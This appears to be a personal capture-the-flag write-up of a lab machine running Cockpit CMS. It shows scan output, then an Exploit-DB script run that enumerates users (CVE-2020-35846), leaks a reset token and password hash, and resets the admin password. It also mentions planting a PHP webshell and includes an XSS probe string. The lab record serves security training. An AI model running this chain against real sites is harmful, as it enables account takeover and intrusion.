Name: CMSpit
Date: 12/03/2022
Difficulty: Medium
Description: This is a machine that allows you to practise web app hacking and privilege escalation using recent vulnerabilities.
Better Description: CMS -> Network-related privEsc -> not so fancy last privEsc
Goals: 1.5 Hours see how far I get(got foothold solo)
Learnt: Lot about MongoDB and accessing it, Nosql, manual exploiting a cms with burp if a exploit script does not work, how you could make it manual process automated, 

root@ip-10-10-15-170:~# nmap -sC -sV -O -T 4 -p- 10.10.138.240

Starting Nmap 7.60 ( https://nmap.org ) at 2022-03-04 19:58 GMT
Nmap scan report for ip-10-10-138-240.eu-west-1.compute.internal (10.10.138.240)
Host is up (0.00041s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 7f:25:f9:40:23:25:cd:29:8b:28:a9:d9:82:f5:49:e4 (RSA)
|   256 0a:f4:29:ed:55:43:19:e7:73:a7:09:79:30:a8:49:1b (ECDSA)
|_  256 2f:43:ad:a3:d1:5b:64:86:33:07:5d:94:f9:dc:a4:01 (EdDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-title: Authenticate Please!
|_Requested resource was /auth/login?to=/
MAC Address: 02:BD:E4:EA:57:11 (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3.13
OS details: Linux 3.13
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1375.83 seconds

# Nmap 7.60 scan initiated Fri Mar  4 20:32:52 2022 as: nmap --script discovery -oA cmsspit -p 80 10.10.138.240
Pre-scan script results:
| targets-asn: 
|_  targets-asn.asn is a mandatory parameter
Nmap scan report for ip-10-10-138-240.eu-west-1.compute.internal (10.10.138.240)
Host is up (0.00021s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-auth-finder: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=ip-10-10-138-240.eu-west-1.compute.internal
|   url                                                                                                            method
|   http://ip-10-10-138-240.eu-west-1.compute.internal:80/                                                         FORM
|   http://ip-10-10-138-240.eu-west-1.compute.internal/auth/check                                                  FORM
|_  http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1  FORM
|_http-chrono: Request times for /; avg: 1045.07ms; min: 396.08ms; max: 1880.46ms
| http-comments-displayer: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=ip-10-10-138-240.eu-west-1.compute.internal
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1078
|     Comment: 
|          // grab value using val
ueIndex if required?
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 938
|     Comment: 
|          // +   original by: Ash Searle (http://hexmen.com/blog/)
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 510
|     Comment: 
|         /**
|          * JSONStorage - a simple storage helper inspired by the redis api.
|          *
|          * @author     Artur Heinze
|          * @copyright  (c) since 2012 Artur Heinze
|          * @license    MIT - http://opensource.org/licenses/MIT
|          * @url        https://github.com/aheinze/JSONStorage
|          */
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1587
|     Comment: 
|          //size = (size * window.devicePixelRatio);
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 944
|     Comment: 
|          // +      input by: Brett Zamir (http://brett-zamir.me)
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 79
|     Comment: 
|         /* [wrapped with "+r+"] */
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 970
|     Comment: 
|          // justify()
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 942
|     Comment: 
|          // +      input by: Paulo Freitas
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 961
|     Comment: 
|          // pad()
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1046
|     Comment: 
|          // parameters may be null, undefined, empty-string or real valued
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1105
|     Comment: 
|          // Should handle locales (as per setlocale)
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 6796
|     Comment: 
|          // catch any error
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 507
|     Comment: 
|         /* bind global plugin */
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 869
|     Comment: 
|          // AMD support
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 954
|     Comment: 
|          // *     example 4: sprintf("%d", 123456789012345);
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 527
|     Comment: 
|          // expires data container
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1420
|     Comment: 
|         
|         // md5() function
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1138
|     Comment: 
|          // browser client
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 983
|     Comment: 
|          // formatBaseX()
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 710
|     Comment: 
|         /* Hash methods */
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 952
|     Comment: 
|          // *     example 3: sprintf("[%'#10s]", 'monkey');
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1058
|     Comment: 
|          // Note: undocumented perl feature:
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 454
|     Comment: 
|         
|         // riot auto mount
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 937
|     Comment: 
|          // From: http://phpjs.org/functions
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1186
|     Comment: 
|          // do nothing
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1675
|     Comment: 
|          // return once no more tags are removed
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1004
|     Comment: 
|          // doFormat()
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1660
|     Comment: 
|         <!--[\s\S]*?-->
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 6945
|     Comment: 
|          // cache
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 349
|     Comment: 
|          // init values
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1405
|     Comment: 
|          // general services
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 12
|     Comment: 
|         
|         //! momentjs.com
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 5
|     Comment: 
|         /*! (C) Andrea Giammarchi - Mit Style License */
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1213
|     Comment: 
|          // send the collected data as JSON
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1663
|     Comment: 
|          // making sure the allowed arg is a string containing only tags in lowercase (<a><b><c>)
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 155
|     Comment: 
|         /* Riot v3.13.2, @license MIT */
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 374
|     Comment: 
|          // small DOM pimping
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 10
|     Comment: 
|         
|         //! authors : Tim Wood, Iskren Chernev, Moment.js contributors
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 996
|     Comment: 
|          // formatString()
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 17
|     Comment: 
|         /**
|          * @license
|          * Lodash lodash.com/license | Underscore.js 1.8.3 underscorejs.org/LICENSE
|          */
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 495
|     Comment: 
|         /* mousetrap v1.6.0 craig.is/killing/mice */
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/false;
|     Line number: 143
|     Comment: 
|          // i18n for uikit-formPassword
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 949
|     Comment: 
|          // *     returns 1: 123.10
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 955
|     Comment: 
|          // *     returns 4: '123456789012345'
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 941
|     Comment: 
|          // +   improved by: Kevin van Zonneveld (http://kevin.vanzonneveld.net)
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1666
|     Comment: 
|          // removes the '<' char at the end of the string to replicate PHP's behaviour
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 940
|     Comment: 
|          // +    tweaked by: Jack
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 946
|     Comment: 
|          // +   improved by: Dj
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 6930
|     Comment: 
|          // unlock resource
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 953
|     Comment: 
|          // *     returns 3: '[####monkey]'
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 6906
|     Comment: 
|          //if (options.pattern == '*' || App.Utils.fnmatch(options.pattern, path)) {
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 397
|     Comment: 
|          // hide [riot-view]
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1913
|     Comment: 
|          //Add-ons:
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1898
|     Comment: 
|          // Modes
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1834
|     Comment: 
|          // stop matching before: last newline => optional whitespace => comment end block
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1833
|     Comment: 
|          // start matching after: comment start block => ! or @preserve => optional whitespace => newline
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1793
|     Comment: 
|          // riot enhancments
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1680
|     Comment: 
|          // custom renderer
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1669
|     Comment: 
|          // recursively remove tags to ensure that the returned string doesn't contain forbidden tags after previous passes (e.g. '<<bait/>switch/>')
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1047
|     Comment: 
|          // we want to ignore null, undefined and empty-string values
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 947
|     Comment: 
|          // +   improved by: Allidylls
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 8
|     Comment: 
|         
|         //! moment.js
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1
|     Comment: 
|         /*! (C) Andrea Giammarchi - @WebReflection - Mit Style License */
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1657
|     Comment: 
|          // eslint-disable-line camelcase
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 939
|     Comment: 
|          // + namespaced by: Michael White (http://getsprink.com)
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1517
|     Comment: 
|          // Unix filename pattern matching *.jpg
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 948
|     Comment: 
|          // *     example 1: sprintf("%01.2f", 123.1);
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 159
|     Comment: 
|         /**
|          * simple two way data-binding for riot
|          */
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 951
|     Comment: 
|          // *     returns 2: '[    monkey]'
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 367
|     Comment: 
|         
|         // riot inline views
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1016
|     Comment: 
|          // parse flags
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 874
|     Comment: 
|          // CommonJS and Node.js module support.
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1798
|     Comment: 
|         /**
|                  * override tag method to know which tags exist
|                  */
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 985
|     Comment: 
|          // Note: casts negative numbers to positive ones
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 662
|     Comment: 
|         /* List methods */
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 6908
|     Comment: 
|          //}
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 950
|     Comment: 
|          // *     example 2: sprintf("[%10s]", 'monkey');
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 482
|     Comment: 
|         /*! UIkit 2.27.5 | http://www.getuikit.com | (c) 2014 YOOtheme | MIT License */
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 529
|     Comment: 
|          // cleanup expires data
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 876
|     Comment: 
|          // Support Node.js specific `module.exports` (which can be a function)
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 15
|     Comment: 
|         /*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 13
|     Comment: 
|         /* "+this._i+" */
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 156
|     Comment: 
|         <!--(?!>)[\S\s]*?-->
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 880
|     Comment: 
|          // But always support CommonJS module 1.1.1 spec (`exports` cannot be a function)
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 1099
|     Comment: 
|          // Plain Math.round doesn't just truncate
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 2065
|     Comment: 
|          // Ensure all modes have a mime property for backwards compatibility
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 563
|     Comment: 
|          // async saving!?
|     
|     Path: http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/7a812eebe1eda3162d79b4109b4787d4.js?ver=0.11.1
|     Line number: 888
|     Comment: 
|         /**
|          * Translation tool
|_         */
|_http-date: Fri, 04 Mar 2022 20:33:07 GMT; -1s from local time.
|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
| http-errors: 
| Spidering limited to: maxpagecount=40; withinhost=ip-10-10-138-240.eu-west-1.compute.internal
|   Found the following error pages: 
|   
|   Error Code: 400
|       http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/{parent.components[item.component].icon ? parent.components[item.component].icon : App.base(\
|   
|   Error Code: 400
|       http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/{components[settingsComponent.component].icon ? components[settingsComponent.component].icon : App.base(\
|   
|   Error Code: 400
|       http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/{asset && ASSETS_URL+asset.path}
|   
|   Error Code: 400
|       http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/{component.icon || App.base(\
|   
|   Error Code: 400
|       http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/+ (ASSETS_URL + v.path) +
|   
|   Error Code: 403
|_      http://ip-10-10-138-240.eu-west-1.compute.internal/storage/tmp/gOPD(ClassProto,"href"),search=gOPD(ClassProto,"search"),createSearchParams;if(!searchParams&&search&&search.set){createSearchParams=createSearchParamsCreate(createSearchParamsPollute(search));Object.defineProperties(ClassProto,{href:{get:function(){return
|_http-feed: Couldn't find any feeds.
| http-headers: 
|   Date: Fri, 04 Mar 2022 20:33:07 GMT
|   Server: Apache/2.4.18 (Ubuntu)
|   Set-Cookie: 8071dec2be26139e39a170762581c00f=76vt81c1u2f5nml1eljdu1m2fp; path=/
|   Expires: Thu, 19 Nov 1981 08:52:00 GMT
|   Cache-Control: no-store, no-cache, must-revalidate
|   Pragma: no-cache
|   Connection: close
|   Content-Type: text/html;charset=UTF-8
|   
|_  (Request type: HEAD)
|_http-mobileversion-checker: No mobile version detected.
|_http-referer-checker: Couldn't find any cross-domain scripts.
| http-security-headers: 
|   Cache_Control: 
|     Header: Cache-Control: no-store, no-cache, must-revalidate
|   Pragma: 
|     Header: Pragma: no-cache
|   Expires: 
|_    Header: Expires: Thu, 19 Nov 1981 08:52:00 GMT
| http-sitemap-generator: 
|   Directory structure:
|     /
|       Other: 1; png: 1
|     /assets/app/css/
|       css: 1
|     /auth/
|       Other: 4
|     /storage/tmp/
|       Other: 2; _id}: 1; alt: 1; exec(e)): 1; js: 2; path);: 1; path}: 1; plugin("lightbox","youtube",{init:function(i){var: 1
|   Longest directory structure:
|     Depth: 3
|     Dir: /assets/app/css/
|   Total files found (by extension):
|_    Other: 7; _id}: 1; alt: 1; css: 1; exec(e)): 1; js: 2; path);: 1; path}: 1; plugin("lightbox","youtube",{init:function(i){var: 1; png: 1
| http-title: Authenticate Please!
|_Requested resource was /auth/login?to=/
| http-useragent-tester: 
|   Status for browser useragent: 200
|   Redirected To: /auth/login?to=/
|   Allowed User Agents: 
|     Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
|     libwww
|     lwp-trivial
|     libcurl-agent/1.0
|     PHP/
|     Python-urllib/2.5
|     GT::WWW
|     Snoopy
|     MFC_Tear_Sample
|     HTTP::Lite
|     PHPCrawl
|     URI::Fetch
|     Zend_Http_Client
|     http client
|     PECL::HTTP
|     Wget/1.13.4 (linux-gnu)
|_    WWW-Mechanize/1.34
| http-vhosts: 
|_127 names had status 302
| http-waf-detect: IDS/IPS/WAF detected:
|_ip-10-10-138-240.eu-west-1.compute.internal:80/?p4yl04d3=<script>alert(document.cookie)</script>
|_http-xssed: No previously reported XSS vuln.
MAC Address: 02:BD:E4:EA:57:11 (Unknown)

Host script results:
| dns-brute: 
|   DNS Brute-force hostnames: 
|_    ns0.eu-west-1.compute.internal - 172.16.0.23
|_fcrdns: PASS (ip-10-10-138-240.eu-west-1.compute.internal)
|_ipidseq: All zeros
|_path-mtu: PMTU == 9001

# Nmap done at Fri Mar  4 20:33:20 2022 -- 1 IP address (1 host up) scanned in 28.68 seconds

root@ip-10-10-15-170:~# nikto -h 10.10.138.240
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          10.10.138.240
+ Target Hostname:    ip-10-10-138-240.eu-west-1.compute.internal
+ Target Port:        80
+ Start Time:         2022-03-04 20:22:08 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Cookie 8071dec2be26139e39a170762581c00f created without the httponly flag
+ The anti-clickjacking X-Frame-Options header is not present.
+ Root page / redirects to: /auth/login?to=/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80 
+ OSVDB-3233: /icons/README: Apache default file found.
+ Uncommon header 'access-control-expose-headers' found, with contents: true
+ Uncommon header 'access-control-allow-origin' found, with contents: *
+ Uncommon header 'access-control-allow-headers' found, with contents: X-Requested-With, Content-Type, Origin, Cache-Control, Pragma, Authorization, Accept, Accept-Encoding, Cockpit-Token
+ Uncommon header 'access-control-max-age' found, with contents: 1000
+ Uncommon header 'access-control-allow-credentials' found, with contents: true
+ Uncommon header 'access-control-allow-methods' found, with contents: PUT, POST, GET, OPTIONS, DELETE
+ 6544 items checked: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2022-03-04 20:22:25 (GMT0) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested




# Wondering why gobuster was not wokring went to the page then start curling my way to victory!
Q1:Cockpit
# Duckduckgo for: Cockpit exploits:
https://www.exploit-db.com/exploits/50185
Q2:0.11.1 #we get it very easy as there are only x.x.x.x exploits as the the others
# run exploit
root@ip-10-10-27-122:~# python3 50185.py -u http://10.10.200.228
[+] http://10.10.200.228: is reachable
[-] Attempting Username Enumeration (CVE-2020-35846) : 

[+] Users Found : ['admin', 'darkStar7471', 'skidy', 'ekoparty']
Q4: 4 

[-] Get user details For : admin
[+] Finding Password reset tokens
         Tokens Found : ['rp-230a1eac30b67940e9655ab8c1f65ada622a1333c0f43']
[+] Obtaining user information 
-----------------Details--------------------
         [*] user : admin
         [*] name : Admin
         [*] email : admin@yourdomain.de
         [*] active : True
         [*] group : admin
         [*] password : $2y$10$dChrF2KNbWuib/5lW1ePiegKYSxHeqWwrVC.FN5kyqhIsIdbtnOjq
         [*] i18n : en
         [*] _created : 1621655201
         [*] _modified : 1621655201
         [*] _id : 60a87ea165343539ee000300
         [*] _reset_token : rp-230a1eac30b67940e9655ab8c1f65ada622a1333c0f43
         [*] md5email : a11eea8bf873a483db461bb169beccec
--------------------------------------------


[+] Do you want to reset the passowrd for admin? (Y/n): Y
[-] Attempting to reset admin's password:
[+] Password Updated Succesfully!
[+] The New credentials for admin is: 
         Username : admin 
         Password : 'i&jDU;"KB


Q5:/auth/resetpassword  # function at line 63 is function to get reset token to then use them 
                        # the directory is in this function
Q6:skidy@tryhackme.fakemail

# Goto finder page, click on the house symbol and start downloading
Q7: webflag.php in home directory on cockpit finder page
# Probably we could delete uplaod to php webshell to be hosted on the site, very noisey, but possible.
# grep -r -e "" things, downloads not in greppable, updated and upgraded attackbox, cried at its speed during ann after
# 
sqlite3 cockpitdb.sqlite

sqlite> .tables
cockpit
sqlite> .show
        echo: off
         eqp: off
     explain: auto
     headers: off
        mode: list
   nullvalue: ""
      output: stdout
colseparator: "|"
rowseparator: "\n"
       stats: off
       width: 
    filename: cockpitdb.sqlite
sqlite> .schema
CREATE TABLE `cockpit` ( id INTEGER PRIMARY KEY AUTOINCREMENT, document TEXT );
CREATE TABLE sqlite_sequence(name,seq);


